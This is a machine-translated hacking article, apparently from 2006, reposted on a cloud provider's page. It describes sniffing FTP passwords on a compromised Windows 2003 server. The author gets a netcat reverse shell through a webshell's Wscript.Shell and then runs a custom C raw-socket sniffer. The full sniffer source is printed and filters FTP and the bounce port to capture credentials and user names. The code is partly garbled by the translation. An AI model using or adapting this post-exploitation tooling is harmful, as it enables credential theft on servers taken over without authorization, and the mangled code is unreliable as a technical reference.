Study on the feasibility of sniffer based on Webshell (FIG) _ Vulnerability Research

Source: Internet
Author: User
Tags sprintf port number
Objective:
Phantom Mix modified Flashsky of that port Multiplexing sniffer serv-u, tested, can not be used in Win2003 server, specifically I do not know, do not know whether the operation has knowledge, anyway, I did not succeed.
I built an environment myself. Try it, the sniffer program is written by itself, using raw for sniffing, if you want to ARP, to install that wincap, think that the low authority is impossible.

Experimental environment:
Windows2003 Server + Ocean 2006+serv-u5.2
The server cannot use Cmd.exe directly, but can upload and execute commands using the Wscript.Shell component.

Experiment steps:
1. Use Wcript.shell to perform NC bounce to get shell

2. Use the Self authoring tool for sniffing (I only sniff 21 and 9001, where 21 is ftp,9001 for bounce port)

/*------------------------------------------------------
*file:snifferftp.c
*effect: Used for sniffing experiments in Webshell, based on Raw
*code:huai_huai
*page:http://hhuai.cn
*date:2006.1.12
*-----------------------------------------------------*/

#include <stdio.h>
#include <string.h>

#include "Winsock2.h"

#pragma comment (lib, "Ws2_32.lib")

#define Sio_rcvall _wsaiow (ioc_vendor,1)
#define Status_failed 0xFFFF
#define Max_pack_len 65535
#define Max_addr_len 16
#define Max_hostname_len 255

Defining IP Headers
typedef struct _IPHDR
{
BYTE Ver_len; Version 4 bits, head length 4 bits, header length to 32 bits per unit
byte type; Type 8 bits
BYTE length[2]; Total length, 16 bits, indicating the total length of the packet in bytes
Message length can not be more than 65,536 words, otherwise think the message is damaged
BYTE id[2]; Message indicator for more than 16 bits of a message
BYTE flag_offset[2];//flag, 3-bit data block offset 13-bit
byte time; Survival time, 8-bit
BYTE Protocol; Protocol, 8-bit
BYTE crc_val[2]; Head checksum, 16-bit
BYTE src_addr[4]; Source address, 32-bit
BYTE tar_addr[4]; Destination address, 32-bit
BYTE options[4]; Options and padding, 32-bit
}ip_header;

typedef struct _TCPHDR
{
BYTE source_port[2]; Send end port number, 16-bit
BYTE dest_port[2]; Receive port port number, 16-bit
BYTE sequence_no[4]; 32 bits, a number that marks the message end of the data in a byte of the whole block of data
BYTE ack_no[4]; 32-bit, confirmation number, indicating receiving end receive data block value for sender
unsigned char offset_reser_con;//data is offset 4 bits, 6 bits reserved, control bit 6 is
unsigned char th_flag;
BYTE window[2]; Window 16 bits
BYTE checksum[2]; Check code, 16-bit
BYTE urgen_pointer[2]; 16-bit, emergency data pointer
BYTE options[3]; Choose auspicious Fill, 32-bit
}tcp_header;

#define PROTOCOL_ICMP 1//Transmission Control Protocol
#define PROTOCOL_GTG 3//gateway-to-gateway
#define PROTOCOL_CGMM 4//CMCC Gateway monitoring message
#define PROTOCOL_ST 5//st
#define PROTOCOL_TCP 6//Transmission Control Protocol
#define PROTOCOL_UCL 7//UCL
#define Protocol_secure 9//secure
#define PROTOCOL_BRM//BBN RCC Monitoring
#define PROTOCOL_NVP//NVP
#define PROTOCOL_PUP//pup
#define Protocol_pluribus//pluribus
#define Protocol_telenet//telenet
#define Protocol_xnet//xnet
#define PROTOCOL_CHAOS//chaos
#define PROTOCOL_UDP//UDP
#define Protocol_multiplexing//multiplexing
#define PROTOCOL_DCN//DCN
#define Protocol_tac_monitoring//TAC Monitoring
#define PROTOCOL_ALN//any Local network
#define Protocol_satnet//satnet and backroom Expak
#define PROTOCOL_MITSS//mit Subnet Support
#define PROTOCOL_SATNET_MONIT//satnet Monitoring
#define PROTOCOL_IPCU//internet Packet Core Utility
#define Protocol_bk_satnet_moni//backroom satnet Monitoring
#define Protocol_wideband_moni//wideband Monitoring
#define PROTOCOL_WIDEBAND_EXPAK//wideband Expak

SOCKET Socketraw;

void Startsniffer ()
{
Char recvbuf[max_pack_len]={0};
Char FAR Name[max_hostname_len];
Wsadata WSA;
struct hostent far* phostent;
Sockaddr_in sa;
DWORD OUTBUFFER[10];
DWORD inbuffer=1;
DWORD bytesreturned=0;

if (WSAStartup (Makeword (2,2), &AMP;WSA)!=0)
{
printf ("Cannot load Winsock dll!");
Exit (0);
}
Socketraw=socket (AF_INET,SOCK_RAW,IPPROTO_IP);
if (Socketraw==invalid_socket)
{
printf ("Cannot create socket!");
Exit (0);
}


GetHostName (Name,max_hostname_len);

Memory is allocated automatically here
Phostent=gethostbyname (name);

Sa.sin_family=af_inet;
Sa.sin_port=htons (6000);
memcpy (&sa.sin_addr. S_un. S_addr,phostent->h_addr_list[0],phostent->h_length);
if (Bind (Socketraw, (psockaddr) &sa,sizeof (sa))!=0)
{
printf ("Cannot bind NIC!");
Closesocket (Socketraw);
Exit (0);
}



if (WSAIoctl socketraw,sio_rcvall,&inbuffer,sizeof (Inbuffer),
&outbuffer,sizeof (Outbuffer), &bytesreturned,null,null)!=0)
{
printf ("Cannot create wsaioctl!");
Closesocket (Socketraw);
Exit (0);
}

}

int ReceiveBuf (byte* buf,int len)
{
Return recv (Socketraw, (char *) buf,len,0);
}

void Main ()
{
int Len;
BYTE recvbuf[65535];
Char buf[16];
int Iphdr_len;
tcp_header* Ptcpheader;
unsigned __int16 src_port;
unsigned __int16 dest_port;
int Hdrlen;
__int16 Datalen;
ip_header* Pipheader;
int port1,port2;

Startsniffer ();
while (TRUE)
{
port1=port2=0;
memset (recvbuf,0,65535);
Len=receivebuf (recvbuf,65535);
if (len>0)
{

Pipheader= (ip_header*) recvbuf;
/*
Switch (PIPHEADER-&GT;PROTOCOL)
{
Case PROTOCOL_ICMP:
printf ("ICMP");
Break
Case PROTOCOL_TCP:
printf ("TCP");
Break
Case PROTOCOL_UDP:
printf ("UDP");
Break
Default
printf ("other agreements");
Break
}
*/



if (PIPHEADER-&GT;PROTOCOL==PROTOCOL_TCP)
{
Iphdr_len= (PIPHEADER-&GT;VER_LEN&AMP;0XF) *4;
Ptcpheader= (tcp_header*) (Recvbuf+iphdr_len);
src_port=ptcpheader->source_port[0]*0x100+ptcpheader->source_port[1];
dest_port=ptcpheader->dest_port[0]*0x100+ptcpheader->dest_port[1];

memset (buf,0,16);
sprintf (buf, "%d", src_port);
Port1=src_port;
printf ("%s", buf);

memset (buf,0,16);
sprintf (buf, "%d", dest_port);
Port2=dest_port;
printf ("%s", buf);

if (port1==21 | | port2==21 | | port1==9001 | | port2==9001)
{
Hdrlen= (Ptcpheader->offset_reser_con) >>2;
memset (buf,0,16);
sprintf (buf, "%s", ((BYTE *) ptcpheader) +hdrlen);
printf ("%s", buf);

memset (buf,0,16);
sprintf (buf, "%d.%d.%d.%d", pipheader->src_addr[0],pipheader->src_addr[1],pipheader->src_addr[2), PIPHEADER-&GT;SRC_ADDR[3]);
printf ("%s", buf);

memset (buf,0,16);
sprintf (buf, "%d.%d.%d.%d", pipheader->tar_addr[0],pipheader->tar_addr[1],pipheader->tar_addr[2), PIPHEADER-&GT;TAR_ADDR[3]);
printf ("%s", buf);



datalen=pipheader->length[0]*0x100+pipheader->length[1];
memset (buf,0,16);
sprintf (buf, "%d", datalen);
printf ("%s", buf);

Hdrlen= (Ptcpheader->offset_reser_con) >>2;
memset (buf,0,16);
sprintf (buf, "%s", ((BYTE *) ptcpheader) +hdrlen);
printf ("%s", buf);
printf ("\ n");

}
}
}

}
}

3. Sniff results:


=800) window.open (/pic/22/a2006-3-1-621a6f.jpg); "Src="/college/uploadpic/2006/8/27/2006827234138485.jpg " Onload= "if (This.width >) this.width = 800;if (This.height >) this.height = A;" border=0>


4. Experimental Summary:
Indeed can sniff some information, in native WinXP SP2 can sniff ftp password, but run on Win2003 server, can only sniff user name, use Webshell can also sniff user name, some operations, such as user directory.
Our Webshell permission can be very low, as long as the use of Wscript.Shell on the line.
There are many details, the need for careful research, million hope Forum Master can give a little hint. (Source: Evil octal Information Security team Author: bad)

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.